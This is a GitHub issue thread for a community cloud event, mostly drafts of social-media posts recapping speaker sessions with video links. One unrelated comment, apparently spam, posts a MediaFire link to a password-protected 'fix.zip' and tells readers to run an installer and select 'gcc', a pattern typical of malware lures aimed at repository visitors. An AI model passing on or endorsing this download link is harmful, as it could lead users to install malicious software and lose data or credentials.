### ISSUE TITLE
Content for speaker video 

### ISSUE THREAD

**Issue by neelshah2409** [oscfcommunity/GCCD2024#111]
Attaching all the speaker video content to be posted on socials (linkedin )

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by neelshah2409** [comment]
### Rinkesh Bansal on 27/8/24 -7pm

**Keynote Recap: Rinkesh Bansal on Cloud Security at CCDGN24** 🚀

Had an incredible time listening to Rinkesh Bansal, Program Director and Master Inventor at IBM, share his insights on Google Cloud Security at Google Cloud Community Day Gandhinagar. His talk was packed with valuable information on securing applications, best practices for cloud app development, and real-world examples from IBM's Cyber Security expertise. 

**Key takeaways:**

-  Securing applications on Google Cloud
- Best practices for cloud app development
- Insights from IBM's Cyber Security expert

A huge thank you to Rinkesh for his insightful keynote !

Here is the link :  https://youtu.be/1r6_qaKbM78?si=Jv2vAf1_yd3PYx6U

Here is the link of playlist of all the sessions : https://youtube.com/playlist?list=PL7m7kHJFCVjVbf0YUpKLi1ZFHUGOzSJ5j&si=Of04zq4vEuG01CB9 

#cloudsecurity #googlecloud #cybersecurity #ccdgn24 #technology #innovation

**Comment by neelshah2409** [comment]
**Session Recap: Dharmesh Vaya on Scaling AI Applications with Cloud Run** 🚀

Had an incredible time listening to Dharmesh Vaya, Google Developer Expert and Solutions Architect at Palo Alto Networks, share his insights on scaling AI applications with Cloud Run at Google Cloud Community Day Gandhinagar. His talk was packed with valuable information on optimizing the serving layer, ingestion layer, training layer, and model deployment. 

**Key takeaways:**
• Serving layer
• Ingestion layer
• Training layer
• Model deployment

A huge thank you to Dharmesh for his insightful session !

Here is the link : https://youtu.be/I7e93KbiENE?si=De70ZGdzWRo2mbWp

Here is the link of playlist of all the sessions : https://youtube.com/playlist?list=PL7m7kHJFCVjVbf0YUpKLi1ZFHUGOzSJ5j&si=Of04zq4vEuG01CB9

#cloudrun #ai #llm #security #googlecloud #technology #innovation

**Comment by neelshah2409** [comment]
**Session Recap: Ashish Tiwari on Multilingual RAG using Gemini and Elastic** 🚀

Had an incredible time listening to Ashish Tiwari, Senior Developer Educator at Elastic, share his insights on advanced Retrieval-Augmented Generation (RAG) techniques at Google Cloud Community Day Gandhinagar. His talk was packed with valuable information on creating ChatGPT-like experiences with private data using chunking, vector search, and embeddings. 

**Key takeaways:**
- Multilingual RAGs and how to implement them 

A huge thank you to Ashish for his insightful keynote !

Here is the link : https://youtu.be/xEkMp7qtsZI?si=z-xF0ihYtKkrRH7v

Here is the link of playlist of all the sessions : https://youtube.com/playlist?list=PL7m7kHJFCVjVbf0YUpKLi1ZFHUGOzSJ5j&si=Of04zq4vEuG01CB9

#ccdgn24 #rag #gemini #elastic #nlp #ai #technology #innovation

**Comment by neelshah2409** [comment]
### Rajani Ekunde - 2/09/24 7pm

**Session Recap: Rajani Ekunde on Google Cloud Functions**

Had an incredible time listening to Rajani Ekunde, DevOps Engineer, share her insights on Google Cloud Functions at Google Cloud Community Day Gandhinagar. Her talk was packed with valuable information on building efficient and scalable serverless architectures. 

**Key takeaways:**
- How to use serverless functions at scale

A huge thank you to Rajani for her insightful session !

Here is the link : https://youtu.be/3hqQNfSv0rI?si=Ku66mM7Dj-oorWb5

Here is the link of playlist of all the sessions : https://youtube.com/playlist?list=PL7m7kHJFCVjVbf0YUpKLi1ZFHUGOzSJ5j&si=Of04zq4vEuG01CB9

#devops #googlecloud #cloudfunctions #serverless #technology #innovation

**Comment by neelshah2409** [comment]
### Nirav Pachchigar on 6/09/24 7pm

**Jamming Session Recap: Nirav Pachchigar at CCDGN24**

What a memorable moment at Google Cloud Community Day Gandhinagar! Nirav Pachchigar, Ecosystem Solution Architect at IBM, took the stage and treated us to an incredible live musical performance. His talent and passion for music created a truly unforgettable atmosphere. 

Here is the link : https://youtu.be/xKT4l7WflQk?si=VJi7AJmquSrojCuH

Here is the link of playlist of all the sessions : https://youtube.com/playlist?list=PL7m7kHJFCVjVbf0YUpKLi1ZFHUGOzSJ5j&si=Of04zq4vEuG01CB9

#ccdgn24 #music #ccdgn24 #ibm #technology #innovation

**Comment by neelshah2409** [comment]
Anubhav Singh on 8/09/24 7pm

**Session Recap: Anubhav Singh on The Rise of Serverless AI Agents at CCDGN24**

Had an amazing time listening to Anubhav Singh, Co-founder of Callchimp.ai and Google Developer Expert, delve into "The Rise of Serverless AI Agents" at Google Cloud Community Day Gandhinagar! His talk explored the exciting future of serverless technology and its potential for AI applications. 

**Key takeaways:**

* How Firebase GenKit simplifies AI model deployment
* Leveraging Google Cloud Run for serverless execution
* Building AI agents with Docker & Kubernetes
* Practical Golang implementation for serverless AI

A huge thank you to Anubhav for his insightful session !!

Here is the link :  https://youtu.be/Z8U0Xq6a2pM?si=9AzKznz_XO4O5MWJ 

Here is the link of playlist of all the sessions : https://youtube.com/playlist?list=PL7m7kHJFCVjVbf0YUpKLi1ZFHUGOzSJ5j&si=Of04zq4vEuG01CB9

#ccdgn24 #serverless #ai #firebase #googlecloud #callchimp #technology #innovation

**Comment by neelshah2409** [comment]
### Harsh Manvar on 10/09/24 7pm

**Session Recap: Harsh Manvar on WASM, GKE, Cloud Run, and More**

Had an incredible time listening to Harsh Manvar, Docker Captain, CNCF Ambassador, Kubernetes Top Answerer, and Google Developer Expert, share his insights on WebAssembly (WASM), Google Kubernetes Engine (GKE), Cloud Run, and other cutting-edge Google Cloud services at Google Cloud Community Day Gandhinagar. His talk was packed with valuable information for anyone looking to stay ahead in the cloud-native world. 

**Key takeaways:**
- All things on WASM was amazing

A huge thank you to Harsh for his insightful session !

Here is the link : https://youtu.be/Cg2nspaHPQc?si=jVLrdyKa4rOhH-s1
Here is the link of playlist of all the sessions : https://youtube.com/playlist?list=PL7m7kHJFCVjVbf0YUpKLi1ZFHUGOzSJ5j&si=Of04zq4vEuG01CB9

#ccdgn24 #wasm #gke #cloudrun #kubernetes  #googlecloud #cloudnative #technology #innovation

**Comment by neelshah2409** [comment]
Rishiraj Acharya on 12/09/24 7pm

**Session Recap: Rishiraj Acharya on Building Multimodal Search with Gemini Vision Models and RAG**

Had an incredible time listening to Rishiraj Acharya, Google Developer Expert in ML, delve into the latest advancements in multimodal search using Gemini Vision models and Retrieval-Augmented Generation (RAG). His talk was packed with valuable insights on computer vision, natural language processing, and the exciting future of machine learning. 

**Key takeaways:**
- How to use RAG and Gemini models to make the magic

A huge thank you to Rishiraj for his insightful session !

Here is the link : https://youtu.be/s3TruBPp53Q?si=tN72Z-dEsPZ5eqmz

Here is the link of playlist of all the sessions : https://youtube.com/playlist?list=PL7m7kHJFCVjVbf0YUpKLi1ZFHUGOzSJ5j&si=Of04zq4vEuG01CB9

#ccdgn24 #machinelearning #gemini #rag #computervision #nlp #googledeveloper #technology #innovation

**Comment by VedantDomadiya** [comment]
### All the X Content
---

**1. Rinkesh Bansal on Cloud Security at CCDGN24 🚀**  
Incredible insights from Rinkesh Bansal, Program Director at IBM, on securing apps with Google Cloud at #CCDGN24! 🌐 Check out the session: https://youtu.be/1r6_qaKbM78  
Playlist: https://youtube.com/playlist?list=PL7m7kHJFCVjVbf0YUpKLi1ZFHUGOzSJ5j  
#CloudSecurity #GoogleCloud  

---

**2. Dharmesh Vaya on Scaling AI with Cloud Run 🚀**  
Amazing session by Dharmesh Vaya, GDE & Solutions Architect at Palo Alto Networks, on scaling AI apps with Cloud Run at #CCDGN24! 🌟 Watch here: https://youtu.be/I7e93KbiENE  
Playlist: https://youtube.com/playlist?list=PL7m7kHJFCVjVbf0YUpKLi1ZFHUGOzSJ5j  
#CloudRun #AI #GoogleCloud  

---

**3. Ashish Tiwari on Multilingual RAG 🚀**  
Loved Ashish Tiwari’s talk on Multilingual RAG using Gemini & Elastic at #CCDGN24! 🎤 Learn how to implement them: https://youtu.be/xEkMp7qtsZI  
Playlist: https://youtube.com/playlist?list=PL7m7kHJFCVjVbf0YUpKLi1ZFHUGOzSJ5j  
#NLP #AI #Elastic  

---

**4. Rajani Ekunde on Google Cloud Functions**  
Great insights from Rajani Ekunde on using Google Cloud Functions for scalable serverless architectures at #CCDGN24! ☁️ Watch now: https://youtu.be/3hqQNfSv0rI  
Playlist: https://youtube.com/playlist?list=PL7m7kHJFCVjVbf0YUpKLi1ZFHUGOzSJ5j  
#Serverless #GoogleCloud  

---

**5. Runcy Oommen on GCP Security**  
Fantastic session by Runcy Oommen on enhancing GCP security posture at #CCDGN24! 🔒 Dive into the details here: https://youtu.be/RSDL87omWlU  
Playlist: https://youtube.com/playlist?list=PL7m7kHJFCVjVbf0YUpKLi1ZFHUGOzSJ5j  
#GCP #Security #Tech  

---

**6. Nirav Pachchigar’s Jamming Session 🎵**  
What a vibe at #CCDGN24! Nirav Pachchigar from IBM rocked the stage with a live musical performance! 🎸 Relive the moment: https://youtu.be/xKT4l7WflQk  
Playlist: https://youtube.com/playlist?list=PL7m7kHJFCVjVbf0YUpKLi1ZFHUGOzSJ5j  
#Music #TechEvent  

---

**7. Anubhav Singh on Serverless AI Agents**  
Incredible insights from Anubhav Singh on serverless AI agents at #CCDGN24! 🤖 Check out the talk: https://youtu.be/Z8U0Xq6a2pM  
Playlist: https://youtube.com/playlist?list=PL7m7kHJFCVjVbf0YUpKLi1ZFHUGOzSJ5j  
#Serverless #AI #GoogleCloud  

---

**8. Harsh Manvar on WASM & Kubernetes**  
Great session by Harsh Manvar on WASM, GKE, Cloud Run & more at #CCDGN24! 💻 Check it out: https://youtu.be/Cg2nspaHPQc  
Playlist: https://youtube.com/playlist?list=PL7m7kHJFCVjVbf0YUpKLi1ZFHUGOzSJ5j  
#WASM #Kubernetes #CloudNative  

---

**9. Rishiraj Acharya on Multimodal Search**  
Loved Rishiraj Acharya’s talk on building multimodal search with Gemini Vision models & RAG at #CCDGN24! 🌟 Watch now: https://youtu.be/s3TruBPp53Q  
Playlist: https://youtube.com/playlist?list=PL7m7kHJFCVjVbf0YUpKLi1ZFHUGOzSJ5j  
#MachineLearning #AI #Tech  

---
